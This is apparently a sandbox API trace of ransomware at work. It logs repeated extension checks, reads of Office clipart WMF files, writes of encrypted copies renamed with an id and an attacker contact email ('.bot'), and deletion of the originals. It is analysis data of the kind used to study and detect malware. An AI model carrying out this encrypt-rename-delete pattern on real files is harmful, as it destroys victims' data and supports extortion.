	[0147.202] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.202] lstrlenW (lpString=".rar") returned 4
	[0147.202] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString=".bz2") returned 4
	[0147.202] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString=".7z") returned 3
	[0147.202] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.202] lstrlenW (lpString=".dbf") returned 4
	[0147.202] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.202] lstrlenW (lpString=".1cd") returned 4
	[0147.202] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.203] lstrlenW (lpString=".jpg") returned 4
	[0147.203] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.203] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.203] lstrlenW (lpString="FD02075_.WMF") returned 12
	[0147.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.203] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4396) returned 1
	[0147.203] CloseHandle (hObject=0x268) returned 1
	[0147.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf")) returned 0x20
	[0147.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.204] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.204] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.204] GetLastError () returned 0x0
	[0147.204] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x112c, lpOverlapped=0x0) returned 1
	[0147.216] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1130, lpOverlapped=0x0) returned 1
	[0147.217] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.217] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.217] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.217] CloseHandle (hObject=0x3a0) returned 1
	[0147.217] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.217] SetEndOfFile (hFile=0x268) returned 1
	[0147.219] CloseHandle (hObject=0x268) returned 1
	[0147.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf")) returned 1
	[0147.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.220] lstrlenW (lpString=".doc") returned 4
	[0147.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.220] lstrlenW (lpString=".docx") returned 5
	[0147.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.220] lstrlenW (lpString=".pdf") returned 4
	[0147.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.220] lstrlenW (lpString=".xls") returned 4
	[0147.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.220] lstrlenW (lpString=".xlsx") returned 5
	[0147.220] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.220] lstrlenW (lpString=".ppt") returned 4
	[0147.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.220] lstrlenW (lpString=".zip") returned 4
	[0147.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.220] lstrlenW (lpString=".rar") returned 4
	[0147.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.220] lstrlenW (lpString=".bz2") returned 4
	[0147.220] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.220] lstrlenW (lpString=".7z") returned 3
	[0147.220] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.221] lstrlenW (lpString=".dbf") returned 4
	[0147.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.221] lstrlenW (lpString=".1cd") returned 4
	[0147.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.221] lstrlenW (lpString=".jpg") returned 4
	[0147.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.221] lstrlenW (lpString=".doc") returned 4
	[0147.221] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString=".docx") returned 5
	[0147.221] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.221] lstrlenW (lpString=".pdf") returned 4
	[0147.221] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString=".xls") returned 4
	[0147.221] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.221] lstrlenW (lpString=".xlsx") returned 5
	[0147.221] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.221] lstrlenW (lpString=".ppt") returned 4
	[0147.221] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.221] lstrlenW (lpString=".zip") returned 4
	[0147.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.221] lstrlenW (lpString=".rar") returned 4
	[0147.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString=".bz2") returned 4
	[0147.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.221] lstrlenW (lpString=".7z") returned 3
	[0147.222] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.222] lstrlenW (lpString=".dbf") returned 4
	[0147.222] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.222] lstrlenW (lpString=".1cd") returned 4
	[0147.222] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63
	[0147.222] lstrlenW (lpString=".jpg") returned 4
	[0147.222] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.222] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.222] lstrlenW (lpString="FD02097_.WMF") returned 12
	[0147.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.222] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1564) returned 1
	[0147.223] CloseHandle (hObject=0x268) returned 1
	[0147.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf")) returned 0x20
	[0147.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.223] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.223] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.232] GetLastError () returned 0x0
	[0147.232] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x61c, lpOverlapped=0x0) returned 1
	[0147.236] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x620, lpOverlapped=0x0) returned 1
	[0147.237] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.237] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.237] SetEndOfFile (hFile=0x384) returned 1
	[0147.237] CloseHandle (hObject=0x384) returned 1
	[0147.238] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.238] SetEndOfFile (hFile=0x268) returned 1
	[0147.242] CloseHandle (hObject=0x268) returned 1
	[0147.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.242] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf")) returned 1
	[0147.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.243] lstrlenW (lpString=".doc") returned 4
	[0147.243] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString=".docx") returned 5
	[0147.243] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.243] lstrlenW (lpString=".pdf") returned 4
	[0147.243] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString=".xls") returned 4
	[0147.243] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.243] lstrlenW (lpString=".xlsx") returned 5
	[0147.243] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.243] lstrlenW (lpString=".ppt") returned 4
	[0147.243] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.243] lstrlenW (lpString=".zip") returned 4
	[0147.243] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.243] lstrlenW (lpString=".rar") returned 4
	[0147.243] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString=".bz2") returned 4
	[0147.243] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString=".7z") returned 3
	[0147.243] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.243] lstrlenW (lpString=".dbf") returned 4
	[0147.243] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.243] lstrlenW (lpString=".1cd") returned 4
	[0147.243] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.243] lstrlenW (lpString=".jpg") returned 4
	[0147.243] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.244] lstrlenW (lpString=".doc") returned 4
	[0147.244] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString=".docx") returned 5
	[0147.244] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.244] lstrlenW (lpString=".pdf") returned 4
	[0147.244] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString=".xls") returned 4
	[0147.244] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.244] lstrlenW (lpString=".xlsx") returned 5
	[0147.244] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.244] lstrlenW (lpString=".ppt") returned 4
	[0147.244] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.244] lstrlenW (lpString=".zip") returned 4
	[0147.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.244] lstrlenW (lpString=".rar") returned 4
	[0147.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString=".bz2") returned 4
	[0147.244] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString=".7z") returned 3
	[0147.244] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.244] lstrlenW (lpString=".dbf") returned 4
	[0147.244] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.244] lstrlenW (lpString=".1cd") returned 4
	[0147.244] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 63
	[0147.244] lstrlenW (lpString=".jpg") returned 4
	[0147.244] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.245] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.245] lstrlenW (lpString="FD02116_.WMF") returned 12
	[0147.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.245] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3988) returned 1
	[0147.245] CloseHandle (hObject=0x268) returned 1
	[0147.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf")) returned 0x20
	[0147.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.246] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.246] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.246] GetLastError () returned 0x0
	[0147.246] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xf94, lpOverlapped=0x0) returned 1
	[0147.256] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xfa0, lpOverlapped=0x0) returned 1
	[0147.257] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.257] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.257] SetEndOfFile (hFile=0x384) returned 1
	[0147.257] CloseHandle (hObject=0x384) returned 1
	[0147.257] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.257] SetEndOfFile (hFile=0x268) returned 1
	[0147.259] CloseHandle (hObject=0x268) returned 1
	[0147.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf")) returned 1
	[0147.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.260] lstrlenW (lpString=".doc") returned 4
	[0147.260] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.260] lstrlenW (lpString=".docx") returned 5
	[0147.260] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.260] lstrlenW (lpString=".pdf") returned 4
	[0147.260] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.260] lstrlenW (lpString=".xls") returned 4
	[0147.260] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.260] lstrlenW (lpString=".xlsx") returned 5
	[0147.260] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.260] lstrlenW (lpString=".ppt") returned 4
	[0147.260] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.260] lstrlenW (lpString=".zip") returned 4
	[0147.260] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.260] lstrlenW (lpString=".rar") returned 4
	[0147.260] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.260] lstrlenW (lpString=".bz2") returned 4
	[0147.260] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.260] lstrlenW (lpString=".7z") returned 3
	[0147.260] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.261] lstrlenW (lpString=".dbf") returned 4
	[0147.261] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.261] lstrlenW (lpString=".1cd") returned 4
	[0147.261] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.261] lstrlenW (lpString=".jpg") returned 4
	[0147.261] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.261] lstrlenW (lpString=".doc") returned 4
	[0147.261] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString=".docx") returned 5
	[0147.261] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.261] lstrlenW (lpString=".pdf") returned 4
	[0147.261] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString=".xls") returned 4
	[0147.261] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.261] lstrlenW (lpString=".xlsx") returned 5
	[0147.261] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.261] lstrlenW (lpString=".ppt") returned 4
	[0147.261] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.261] lstrlenW (lpString=".zip") returned 4
	[0147.261] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.261] lstrlenW (lpString=".rar") returned 4
	[0147.261] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString=".bz2") returned 4
	[0147.261] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.261] lstrlenW (lpString=".7z") returned 3
	[0147.261] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
